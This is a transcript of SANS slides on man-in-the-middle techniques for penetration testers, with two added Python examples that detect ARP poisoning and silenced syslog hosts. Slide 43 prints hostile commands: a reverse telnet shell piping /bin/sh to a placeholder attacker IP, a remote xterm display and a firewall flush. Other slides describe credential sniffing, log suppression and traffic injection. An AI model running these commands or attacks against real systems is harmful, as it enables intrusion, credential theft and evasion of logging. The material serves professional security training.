All your layer are belong to us
This presentation discusses various uses of man-in-the-middle attacks for penetration testers.

Published in: Technology

Transcript

  • 1. SANS Institute
    “Incorporating Advanced MitM Attacks in Your Penetration Testing Regimen”
    Layered Security
    Bryce Galbraith, Owner
    CISSP, GCIH, GSEC, CEH, CHFI, Security+, CCNA
    bryce@layeredsec.com
    http://blog.layeredsec.com/
    ©2009 SANS & Bryce Galbraith
  • 2. SANS Biography
    Bryce Galbraith - Lead Consultant, Layered Security
    Bryce began his IT journey at 10 years of age with a Commodore 64 and a 300 baud modem. As a contributing author of the internationally bestselling book Hacking Exposed: Network Security Secrets & Solutions, Bryce helped bring the secret world of hacking out of the darkness and into the public eye. Bryce has held security positions at global ISPs and Fortune 500 companies as well as being a senior member of Foundstone’s world-renowned attack and penetration team. Bryce also served as senior instructor and co-author of Foundstone’s “Ultimate Hacking: Hands-On” series. He has taught the art of ethical hacking and countermeasures to thousands of IT professionals from a who’s who of top companies, financial institutions, and government agencies around the globe. Bryce currently teaches Security 504: Hacker Techniques, Exploits and Incident Handling; Security 560: Network Penetration Testing and Ethical Hacking; Security 517: Cutting-Edge Hacking Techniques; Security 550: Advanced Information Recon; Security 401: SANS Security Essentials Bootcamp Style; and Security 561: Network Penetration Testing: Maximizing the Effectiveness of Reports, Exploits, and Command Shells for the SANS Institute. Bryce is an active member of several security-related professional organizations, he speaks at a variety of conferences, and he holds a number of certifications: CISSP, GCIH, GSEC, CEH, CHFI, Security+, and CCNA. Bryce is currently the lead consultant and co-founder of Layered Security.
  • 3. Coming Up!
    • Overview
    • Token Warnings
    • The Toolz
    • ARP-Poisoning Primer
    • The Attacks
    • The Future?
    • Q&A
  • 4. Overview
    • What do you do when traditional attack vectors fail?
      – Remote exploits, password guessing, web app attacks, etc.
      – Social Engineering? Physical attacks?
      – They rarely fail but if they do,
    • What’s left, the report?
  • 5. Overview
    • There are other options – MitM!
    • MitM attacks open up systems that might otherwise be impregnable.
      – No weak passwords, no public exploits, ACLs, strong authentication even – inconceivable, right!? Not exactly…
    • Besides, MitMs are cooler than guessing passwords or pwning weak systems ;)
  • 6. Overview
    • We’re going to discuss several strategic uses of MitM…
    • And the toolz you will need to perform them effectively.
    • We don’t have time to get into the weeds so I’m going to focus on the scenarios and the toolz…
  • 7. Token Warning
    • Always, always, always secure written permission prior to performing ANY testing.
    • Especially the things I’m about to show you.
    • Client-side attack focus – touchy!
  • 8. Token Warning
    • Additional considerations
    • MitM attacks are particularly dangerous on production networks.
    • They can seriously break things!
    • The toolz have gotten much better but they are not foolproof.
    • Always…
  • 9. Token Warning
    • RTFM – Read the Fine Manual ;)
      – Because, “There is no patch for stupidity.”
    • Turn off your personal firewall.
    • Practice, practice, practice!
    • Think before you act.
    • Did I mention permission?
  • 10. Toolz
    • Ok, so as with most of what we do, we are going to need some toolz.
    • Practice with these toolz in a lab environment until you are familiar with how they work AND how they fail to work ;)
  • 11. Toolz
    • dsniff
      • http://monkey.org/~dugsong/dsniff/
    • An oldie but a goodie
    • Mostly mentioned here to give credit where credit is due – nice!
    • Can still be useful…
  • 12. Toolz
    • dsniff
      – Passive
        • dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, webspy
      – MitM
        • arpspoof, macof, dnsspoof, sshmitm and webmitm
  • 13. Toolz
    • ettercap
      – http://ettercap.sourceforge.net/
    • Powerful MitM framework
    • Many, many features.
    • Extensible with plug-ins and ettercap “filters” – stay tuned!
    • Current development work??
  • 14. Toolz
    • Paros Proxy
      – http://www.parosproxy.org/
    • Burp Suite
      – http://www.portswigger.net/
    • Web application proxies with many desirable features for manipulating web traffic – hmm…
  • 15. Toolz
    • IRS & Sterm
      – http://www.oxid.it/
    • A powerful duo for exploiting IP-based trust and gaining access to systems with ACLs specifically designed to keep you out!
      – Can spoof telnet sessions on a switch
  • 16. Toolz
    • Cain & Abel
      – http://www.oxid.it/
    • Deceptively easy – oh so powerful!
    • Too many features to list.
    • Stay tuned…
  • 17. Toolz
    • Wireshark
      – http://www.wireshark.org/
    • Good for analysis of traffic and protocols in use on the network to find opportunities for exploitation.
    • A must-have general purpose tool.
  • 18. Toolz
    • Metasploit
      – http://www.metasploit.com/
    • Not a MitM tool per se but very helpful in this whole process.
    • Some of the latest features in particular.
    • MitM Framework modules anyone?
  • 19. Toolz
    • KARMA
      – http://blog.trailofbits.com/karma/
    • Great for assisting you in attacking wireless clients.
    • Features are included in Metasploit as of v3.2.
  • 20. Toolz
    • Rainbow Tables
      – Google will guide you…
    • Can be used to crack strong passwords once gathered via MitM.
      – (e.g. a 14 character random password in LanMan form)
  • 21. Toolz
    • iptables & squid proxy
    • Your favorite scripting language(s)
    • Out-of-the-box thinking – A.K.A. a devious mind ;)
      – “How can I monkey with this traffic to get what I’m after?”
  • 22. Toolz
    • tcpreplay
      – http://tcpreplay.synfin.net/trac/
    • nemesis
      – http://nemesis.sourceforge.net/
    • scapy
      – http://www.secdev.org/projects/scapy/
    • sslstrip
      – http://www.thoughtcrime.org/software/sslstrip/
  • 23. Toolz
    • Hamster & Ferret
      – http://erratasec.blogspot.com/
    • The Middler
      – http://www.inguardians.com/tools/
    • ISR-evilgrade (particularly nasty)
      – http://www.infobyte.com.ar/
    • Browser Exploitation Framework (BeEF)
      – http://www.bindshell.net/tools/beef/
    • Many others…
      – “Top 100 Network Security Tools”
        • http://sectools.org/
  • 24. Toolz
    • Last but not least,
    • If you’re going to be doing these attacks over wireless networks
    • You may need one of these…
      – They combat mind-control
      – And protect your brain from RF
        • http://zapatopi.net/afdb/ ;)
  • 25. Hey man… (image slide)
  • 26. ARP-Poisoning Primer
    • Before we get rolling I need to make sure everyone has at least a basic understanding of ARP-poisoning and how it can put us in the middle of the action.
    • An enabler for numerous attacks.
    • We have limited time so…
  • 27. ARP-Poisoning Primer
    • On an Ethernet subnet hosts need to know the MAC address(es) of the host(s) they are trying to send Ethernet frames to.
    • Enter, ARP (Address Resolution Protocol)
      – ARP resolves IPs to MAC addresses
  • 28. ARP-Poisoning Primer
    • ARP Requests go out to the broadcast addr FF:FF:FF:FF:FF:FF
      – Which host has IP w.x.y.z bound to your network adapter?
    • All hosts receive this broadcast
      – Even on a switch
  • 29. ARP-Poisoning Primer
    • Only the host with the requested IP bound to its adapter responds with an ARP Reply
      – I have w.x.y.z bound and my MAC address is xx:xx:xx:xx:xx:xx
    • Only the requester sees the reply
  • 30. ARP-Poisoning Primer
    • Once the MAC is learned a very important thing happens.
    • It is cached - for a while…
      – Seconds, minutes, hours - depending
    • Enter, ARP Cache Poisoning
    • What if WE can influence this cached ARP entry?
  • 31. ARP-Poisoning Primer
    • By sending an unrequested ARP Reply (a.k.a. Gratuitous ARP Reply) to a host we can poison their ARP Cache with any MAC we choose.
    • Sweet!
    • Let’s poison them with our MAC?
  • 32. ARP-Poisoning Primer
    • If we tell both of them that we’re the other one, turn on a little IP-forwarding and…boom! We’re in the middle!
    • Now we’re talking…
    • Not just a local LAN attack either
      – Poison gateway as well
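The primer above also describes exactly what a poisoned segment looks like to anyone watching it: replies nobody asked for, a known IP whose MAC suddenly changes, and one MAC answering for both a host and its gateway. The Python monitor below is an added example, not part of the original slides; it parses raw ARP-over-Ethernet frames and flags all three symptoms. All addresses and frames are constructed for the example, and the monitor assumes a capture point (such as a mirror/SPAN port) that sees both the broadcast requests and the unicast replies.

```python
import struct
from collections import defaultdict
ETH_FMT, ARP_FMT = "!6s6sH", "!HHBBH6s4s6s4s"  # 14-byte Ethernet header + 28-byte ARP body
ETHERTYPE_ARP, ARP_REQUEST, ARP_REPLY, BROADCAST = 0x0806, 1, 2, "ff:ff:ff:ff:ff:ff"

def mac_str(b): return ":".join(f"{x:02x}" for x in b)
def ip_str(b): return ".".join(str(x) for x in b)
def mac_bytes(s): return bytes(int(x, 16) for x in s.split(":"))
def ip_bytes(s): return bytes(int(x) for x in s.split("."))

def parse_arp(frame):
    """Return the ARP fields of an Ethernet frame, or None if it is not IPv4-over-Ethernet ARP."""
    if len(frame) < 42 or struct.unpack(ETH_FMT, frame[:14])[2] != ETHERTYPE_ARP:
        return None
    htype, ptype, hlen, plen, op, sha, spa, tha, tpa = struct.unpack(ARP_FMT, frame[14:42])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {"op": op, "sha": mac_str(sha), "spa": ip_str(spa), "tha": mac_str(tha), "tpa": ip_str(tpa)}

def build_arp(op, sha, spa, tha, tpa):
    """Constructed test frame (not captured traffic): requests are broadcast, replies unicast."""
    eth = struct.pack(ETH_FMT, mac_bytes(BROADCAST if op == ARP_REQUEST else tha),
                      mac_bytes(sha), ETHERTYPE_ARP)
    return eth + struct.pack(ARP_FMT, 1, 0x0800, 6, 4, op, mac_bytes(sha), ip_bytes(spa),
                             mac_bytes(tha), ip_bytes(tpa))

class ArpMonitor:
    """Flags the poisoning symptoms of slides 31-32; assumes it sees requests (broadcast)
    and replies, e.g. from a mirror/SPAN port, since replies are unicast to the requester."""
    def __init__(self):
        # pending: IPs asked about and not yet answered; binding: IP -> MAC; claims: MAC -> IPs
        self.pending, self.binding, self.claims = set(), {}, defaultdict(set)

    def observe(self, frame):
        a = parse_arp(frame)
        if a is None or a["op"] not in (ARP_REQUEST, ARP_REPLY):
            return []
        if a["op"] == ARP_REQUEST:
            self.pending.add(a["tpa"])
            return []
        alerts = []
        if a["spa"] in self.pending:      # 1. a reply nobody asked for = gratuitous reply (slide 31)
            self.pending.discard(a["spa"])
        else:
            alerts.append(f"unsolicited reply: {a['spa']} is-at {a['sha']}")
        old = self.binding.get(a["spa"])  # 2. a known IP suddenly moves to another MAC
        if old is not None and old != a["sha"]:
            alerts.append(f"binding change: {a['spa']} {old} -> {a['sha']}")
        self.binding[a["spa"]] = a["sha"]
        self.claims[a["sha"]].add(a["spa"])  # 3. one MAC posing as both ends (slide 32);
        if len(self.claims[a["sha"]]) > 1:   #    hosts with legitimate IP aliases trigger this too
            alerts.append(f"one MAC claims several IPs: {a['sha']} -> {sorted(self.claims[a['sha']])}")
        return alerts

def demo():
    victim_ip, victim_mac = "10.0.0.10", "00:11:22:33:44:10"
    gw_ip, gw_mac = "10.0.0.1", "00:11:22:33:44:01"
    attacker_mac = "de:ad:be:ef:00:01"  # made-up address for the example
    mon = ArpMonitor()  # constructed traffic: one legitimate exchange, then both ends get poisoned
    return [mon.observe(f) for f in (
        build_arp(ARP_REQUEST, victim_mac, victim_ip, "00:00:00:00:00:00", gw_ip),  # who has gw?
        build_arp(ARP_REPLY, gw_mac, gw_ip, victim_mac, victim_ip),        # real gateway answers
        build_arp(ARP_REPLY, attacker_mac, gw_ip, victim_mac, victim_ip),  # "I am the gateway"
        build_arp(ARP_REPLY, attacker_mac, victim_ip, gw_mac, gw_ip),      # "I am the victim"
    )]
```

On a real segment the same checks are what static ARP entries, switch dynamic ARP inspection and tools such as arpwatch rely on; the legitimate exchange in `demo()` produces no alerts, while each poisoning reply produces two.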
  • 33. ARP-Poisoning Primer
    • This attack puts us in a position to potentially influence EVERYthing that happens at Layers 2-7.
    • If it’s wireless, maybe Layer 1 even
    • What happens at Layers 2-7??
      – What doesn’t happen is a shorter list!
    • It’s game on!
  • 34. ARP-Poisoning Primer
    • These attacks can even influence layers 8 and 9, “Politics & Funding”
      – The most impregnable layers of all!
    • Demonstrations of these techniques have freed up serious funding and/or caused sweeping policy changes…
  • 35. The Attacks
    • Now for the fun stuff!
    • I will lay out several scenarios where using MitM can be of particular use.
    • Let’s see how to crack the tough nuts!
    • Not theoretical! These work today…
  • 36. The Attacks
    • Credential Sniffing
      – A mainstay of MitM attacks!
      – I would be remiss if I didn’t mention it - oh so helpful!
      – MitM makes it possible on switches.
      – Cain, dsniff and ettercap excel at this.
  • 37. The Attacks
    • Credential Sniffing
      – Web Proxy Logins over HTTP
        • Using Windows Domain credentials – doh!
        • I have seen this at numerous clients.
      – VoIP Sniffing
        • Nothing quite like it really.
      – And of course the old favorites…
  • 38. “Can you hear me now?” (image slide)
  • 39. The Attacks
    • So sniffing is awesome
    • It can make all the difference in an assessment,
    • But there are more interesting things that can be done, so let’s move on…
  • 40. The Attacks
    • Command Injection
      – Being able to inject arbitrary commands into an existing, authorized connection can be immensely helpful.
      – Great way to bypass strong authentication systems (e.g. one-time passwords, smart cards, DNA?, etc.)
  • 41. The Attacks
    • Command Injection
      – People rely too heavily on authentication and ignore the transport mechanism.
        • e.g. One-time password system over Telnet/HTTP
      – Btw, how are tokens synchronized?
      – Where is this data stored?
  • 42. (image slide, no text)
  • 43. The Attacks
    • Command Injection
      – Sample attacks for *nix targets
        • xterm –display [hackerIP]:0.0 &
        • iptables –F
        • Reverse Telnet – telnet [hackerIP] [port] | /bin/sh | telnet hackerIP [port]
        • Add an account, disable logging, tftp shadow file, run virtually any command…
  • 44. The Attacks
    • Command Injection
      – Sample attacks for Cisco gear
        • Clear/adjust an ACL
        • TFTP the router config back to you
        • Disable/reduce logging
        • Turn on a service that may help you
          – SNMP, ip proxy-arp, etc.
      – You get the idea…
  • 45. The Attacks
    • Re-Direction
      – DNS Spoofing
        • Allows you to direct victims wherever you like
        • Their URL looks legit (e.g. www.google.com)
        • Great for:
          – Delivering client-side attacks to more savvy users
          – Social Engineering
          – Advanced phishing attacks
            » Maybe impersonate the proxy login (if it isn’t already clear-text HTTP ;)
  • 46. The Attacks
    • Breaking Crypto
      – Being in the middle affords great opportunities to attack crypto systems as well
        • SSHv1, RDP, PPTP
          – RDP MitM yields all keystrokes typed during session
        • SSL (FTPS, POP3S, IMAPS, LDAPS)
        • SSL VPNs? Inconceivable! Right?
          – pwnd! Credentials and all traffic being routed.
  • 47-57. RDP MitM (screenshot slides)
  • 58. RDP MitM
    • No matter what your password is… .:[Th3y_w1ll-N3v3r/Gu3$$Th1$0n3]:.
  • 59. The Attacks
    • Breaking Crypto
      – Downgrade Attacks
        • NTLM to LM
          – Rainbow Tables – done!
          – Pass-the-Hash Toolkit
        • PPTP CHAP to PAP
        • SSHv2 to SSHv1
        • And others…
  • 60. The Attacks
    • Strategic DoS Attacks
      – What happens if a particular target router using AAA (e.g. RADIUS) can’t reach the server, say three times?
        • Fails to local login usually
        • Local password hash is in config
          – Sniff: TFTP, FTP, Telnet, HTTP, SNMP, etc.
          – Hijack once to get config, then DoS AAA access
        • Can bypass strong authentication entirely
  • 61. The Attacks (“These are not the logs you’re looking for…”)
    • Strategic DoS Attacks
      – How about syslog?
        • If we get in the middle of our target and the remote syslog facility…
        • We can create a warp in the space/time continuum where no log entries are stored!
        • Just from our target host! All other logging continues unaffected.
        • Once access is gained, local logs can be removed on the target as well
          – What hacker?
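Slide 61 makes the defender's point for them: only the target's stream goes dark while every other host keeps logging, and that asymmetry is something the collector can measure. The Python below is an added example, not anything from the original presentation; it compares each expected host's last event against the newest event in the feed, so a host that went silent while the rest of the network kept talking is reported, as is one that never reported at all. The syslog lines, host names and inventory are constructed for the example, and RFC 3164 timestamps carry no year, so one is assumed.

```python
import re
from datetime import datetime, timedelta

# Constructed collector feed in BSD syslog (RFC 3164) layout, not a real capture. Three
# devices are expected to report; only fw-edge1 keeps logging after 09:00:12.
SAMPLE_FEED = """\
Mar 10 09:00:01 rtr-core1 sshd[412]: Accepted publickey for netops from 10.0.5.20
Mar 10 09:00:05 fw-edge1 kernel: [fw] ACCEPT IN=eth0 OUT=eth1 SRC=10.0.5.20 DST=10.0.9.8
Mar 10 09:00:12 rtr-core1 sshd[412]: session opened for user netops
Mar 10 09:07:44 fw-edge1 kernel: [fw] DROP IN=eth0 SRC=203.0.113.7 DST=10.0.9.8
Mar 10 09:15:30 fw-edge1 cron[201]: (root) CMD (logrotate)
Mar 10 09:23:02 fw-edge1 kernel: [fw] ACCEPT IN=eth0 OUT=eth1 SRC=10.0.5.21 DST=10.0.9.8
"""
EXPECTED_HOSTS = ("rtr-core1", "fw-edge1", "web-dmz1")  # inventory of devices that must report

LINE_RE = re.compile(r"^(\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) (\S+) ")
YEAR = 2009  # RFC 3164 timestamps carry no year; assumed for the constructed sample

def parse_ts(text):
    # Collapse the double space BSD syslog uses for single-digit days before parsing.
    return datetime.strptime(" ".join(text.split()), "%b %d %H:%M:%S").replace(year=YEAR)

def last_seen_by_host(feed):
    """Newest timestamp per reporting host, plus the newest timestamp in the whole feed."""
    seen, newest = {}, None
    for line in feed.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unparsable line: a real collector should count these separately
        ts, host = parse_ts(m.group(1)), m.group(2)
        seen[host] = max(ts, seen.get(host, ts))
        newest = ts if newest is None else max(newest, ts)
    return seen, newest

def silent_hosts(feed, expected, max_gap=timedelta(minutes=15)):
    """Expected hosts that went quiet while the rest of the feed kept flowing.
    The gap is measured against the newest event in the feed rather than the wall
    clock, so the same check works on archived logs. A host with no events at all
    is reported too: a poisoned ARP entry for the collector drops its whole stream."""
    seen, newest = last_seen_by_host(feed)
    findings = {}
    if newest is None:
        return findings  # empty feed: a collector outage, not a per-host symptom
    for host in expected:
        if host not in seen:
            findings[host] = "no events received"
        elif newest - seen[host] > max_gap:
            findings[host] = f"silent for {newest - seen[host]} while other hosts kept logging"
    return findings
```

The gap threshold has to be tuned per device class (a quiet router legitimately logs less than an edge firewall); a periodic "mark" message from each device, or syslog over TCP/TLS so a dropped session is itself an event, makes the check far less noisy.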
  • 62. The Attacks
    • So, I could go on with these types of scenarios but I want to focus on the particularly nasty attacks that MitM enables…
  • 63. The Attacks
    • Arbitrary Modification/Insertion
      – It’s all about trusting trust.
      – We have to trust at some level to get any work done (or “waste” time on non work-related activities ;)
      – What if the communications to/from the system we “trust” are influenced, real-time, by an attacker? Hmm…
  • 64. The Attacks
    • Arbitrary Modification/Insertion
      – The next several scenarios serve as an overview of the numerous opportunities MitM provides with common network traffic.
      – This actually affects ALL of US when we’re online as well.
      – “Turnabout is fair play”, as they say...
  • 65. The Attacks
    • Arbitrary Modification/Insertion
      – To get the ball rolling, here is a little scenario I cooked up to illustrate what I mean…
        • DNS spoof www.cnn.com to my machine
        • Proxy the web traffic using Paros Proxy
        • Use a filter to find/replace HTML on the return!
      – The victim(s) see…
  • 66. Virtually any page element or DNS request… (image slide)
  • 67. The Attacks
    • Arbitrary Modification/Insertion
      – Being able to modify or insert most anything we want opens up all sorts of opportunities.
      – Even if the user gets some kind of warning, it’s a “trusted” site right?
      – Can even bypass tools like the popular NoScript Firefox plug-in!
  • 68. The Attacks
    • Arbitrary Modification/Insertion
      – Scenarios
        • Insert nefarious web content into stream
          – JavaScript, ActiveX and other active web content…
        • Major enabler for XSS attacks
        • Steal auth/session cookies to re-use
        • IFrame attacks
        • Substitute any text, links, graphics at will
        • Replace a download link with your file ;)
  • 69. (image slide, no text)
  • 70. The Attacks
    • Arbitrary Modification/Insertion
      – Scenarios
        • Substitute embedded video/audio links
        • Inject code to post their creds to you first without SSL, then establish SSL and post to the real site.
          – sslstrip does this
        • Replace a hyperlink with a UNC connection to cause Windows creds to be sent to you.
  • 71. The Attacks
    • Arbitrary Modification/Insertion
      – Scenarios
        • View contents of the Clipboard of the visiting browser – thank you Internet Explorer!
        • Pop up windows – “Your Google Toolbar is out-of-date. Click here to…”
        • ISR-evilgrade – truly nasty
        • Web-based e-mail
          – Read/modify messages/contacts, upload/download a different attachment real-time.
  • 72. The Attacks
    • Arbitrary Modification/Insertion
      – Scenarios
        • More realistic and elaborate Phishing and other Social Engineering attacks.
          – Real site content, slightly modified on the return.
        • Intranet sites – Phishing?
        • “Test” web-apps under the context of a legitimate user!? Are they hacking the site??
          – By injecting SQL commands for instance
  • 73. The Attacks
    • Arbitrary Modification/Insertion
      – Scenarios
        • VoIP call setup and tear down manipulation
          – Often clear-text HTTP-like commands
        • IM traffic – “Check out this file!”
        • Stock “Pump n’ Dump” transactions
        • Inject SQL commands between web/app server and the database server – it’s the trusted web/app server, right?
  • 74. The Attacks
    • Arbitrary Modification/Insertion
      – Scenarios
        • Manipulate other protocols, custom protocols…
        • SCADA
      – The only limitation here is your imagination really…
  • 75. The Attacks
    • Arbitrary Modification/Insertion
      – Getting all of this set up on a local LAN is relatively straightforward.
      – Wireless is basically the same; however, it provides additional opportunities.
      – Check out this very versatile rig that I use for some wireless attacks…
  • 76. The Attacks
    • Portable AP w/ Internet – So many options… (diagram; labels as extracted)
      – “concourse” Internet
      – Wireless broadband (e.g. EV-DO, EDGE, 3G) - Built-in to many laptops today
      – Internet Connection Sharing
      – D-Link DWL-G730AP USB Access Point - Built-in wireless assoc to AP
      – Running Cain (Windows)
      – BackTrack in a VM or on a second laptop w/ another wireless card.
  • 77. The Attacks
    • Uh hmm…
      – Did I mention permission??
    • So what about the future?
  • 78. The Future?
    • We will likely see…
      – Additional side-jacking tools
        • Myspace, Facebook, LinkedIn, web mail, etc.
      – RDP playback with full graphical display. Cain gets all the data…
      – Injection - SSL, RDP, SSHv1, SSHv2?
      – Additional downgrade attacks
      – Better VoIP Replay/modification toolz
  • 79. The Future?
    • How about…
      – A fully extensible and modular MitM framework built into Metasploit
        • Metasploit-in-the-Middle anyone??
        • Metasploit 3.2 is a start…
      – RFID attacks?
        • “Elvis Comes Back from the Dead to Prove RFID ePassports Lack Security”
  • 80-81. The Future? (image slides)
  • 82. I told you, man… (image slide)
  • 83. End-user awareness?
    • Used in a test. Users couldn’t click it fast enough…
  • 84. Discretion? (image slide)
  • 85. The future? (image slide)
  • 86. SANS Institute
    “Incorporating Advanced MitM Attacks in Your Penetration Testing Regimen”
    Layered Security
    Bryce Galbraith, Lead Consultant & Co-Founder
    CISSP, GCIH, GSEC, CEH, CHFI, Security+, CCNA
    bryce@layeredsec.com
    http://blog.layeredsec.com/
